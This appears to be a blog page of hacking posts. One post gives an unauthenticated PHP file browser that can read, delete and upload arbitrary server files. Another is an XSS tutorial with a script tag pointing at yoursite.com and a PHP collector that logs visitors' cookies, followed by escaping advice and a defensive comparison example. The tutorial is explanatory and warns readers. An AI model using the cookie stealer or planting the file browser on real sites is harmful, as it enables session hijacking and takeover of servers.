Posts tagged hacking

A 20-line filebrowser-ftp client script in PHP

Here's an example of a minimal file browser script, similar to a remote FTP client. You can browse files, download them, delete them and upload new ones.

<?php
if(isset($_GET['p']) && $_GET['p'])
    if(is_file($_GET['p'])){
        header('Content-Disposition: attachment; filename="'.basename($_GET['p']).'"');
        die(file_get_contents($_GET['p']));
    }else
        chdir(realpath($_GET['p']));
$base_path=getcwd().DIRECTORY_SEPARATOR;
if(isset($_FILES['f']['tmp_name']) && $_FILES['f']['tmp_name'])
    move_uploaded_file($_FILES['f']['tmp_name'], $base_path.$_FILES['f']['name']);
if(isset($_GET['d']) && is_file($base_path.$_GET['d']))
    unlink($base_path.$_GET['d']);
$files=scandir($base_path);
$html_list='';
foreach($files as $file){
    $p=urlencode($base_path.$file);
    $html_list.="<li><a href=\"?p=".$p."\">$file</a> ".((is_file($base_path.$file))?"| <a href=\"?p=$p&d=$file\">delete</a>":"")."</li>";
}
$form_upload='<form action="" method="POST" enctype="multipart/form-data"><input type="file" name="f" /><input type="submit" /></form>';
echo "<h1>".getcwd()."</h1>$form_upload<ul>$html_list</ul>";

And here is a screenshot:

Pay attention: this script is not production ready. It is only an experiment to demonstrate the minimum work needed to create a complete file browser script. Putting it on a public website could be dangerous.

Javascript Hack – easy XSS example

You can find tons of cross-site scripting hacks. I want to warn you about a common and easy-to-do type.

The first step is to insert a JavaScript include tag in a user page of a shared web service:

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, you need to put a script at http://yoursite.com/cookiejar.php, with the following code:

<?php
if(!is_array($_COOKIE)) die();
foreach($_COOKIE as $cookie_name => $cookie_value)
    file_put_contents('cookiejar.txt',
                         $cookie_name.':'.$cookie_value."\n",
                         FILE_APPEND);

If the website allows you to insert raw HTML or tags, after a while you will see the cookies of all the users who visit the page with the tag you inserted.

So, you should never trust user-generated content. The better way to avoid XSS is to use an advanced web framework, like Django, Rails or Symfony. But if you are writing your own project, always remember to parse the user input, strip the tags or convert all the text with urlencoding.
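
The two manual options named above, next to the unprotected output, as an added example that is not part of the original post. The function names and the sample profile text are constructed for illustration. For the "convert all the text" option it uses htmlspecialchars(), because the value is echoed into an HTML body.

```php
<?php
// Added example, not from the original post. Function names and the sample
// input are constructed; the script tag is the one shown in the post.

// Vulnerable: user content is concatenated into the page unchanged.
function render_raw(string $bio): string {
    return '<div class="bio">' . $bio . '</div>';
}

// "Strip the tags": markup is removed, the remaining text is kept.
// The PHP manual warns that strip_tags() does not validate HTML, so broken
// or partial tags can remove more text than expected.
function render_stripped(string $bio): string {
    return '<div class="bio">' . strip_tags($bio) . '</div>';
}

// Encode on output: <, >, &, " and ' become entities, so the browser
// displays the text instead of parsing it as markup.
function render_escaped(string $bio): string {
    $safe = htmlspecialchars($bio, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="bio">' . $safe . '</div>';
}

// Check: parse the rendered fragment with an HTML parser and count the
// <script> elements that survive. Nothing is fetched or executed.
function count_script_elements(string $html): int {
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    return $doc->getElementsByTagName('script')->length;
}

// Constructed sample: a profile text carrying the include tag from the post.
$bio = 'Hello! <script language="javascript" '
     . 'src="http://yoursite.com/cookiejar.php"></script>';

foreach (['render_raw', 'render_stripped', 'render_escaped'] as $renderer) {
    $html = $renderer($bio);
    printf("%-16s scripts=%d  %s\n", $renderer, count_script_elements($html), $html);
}
```

Run it with the PHP command-line interpreter (the DOM extension must be enabled) to see which renderers still emit a live script element.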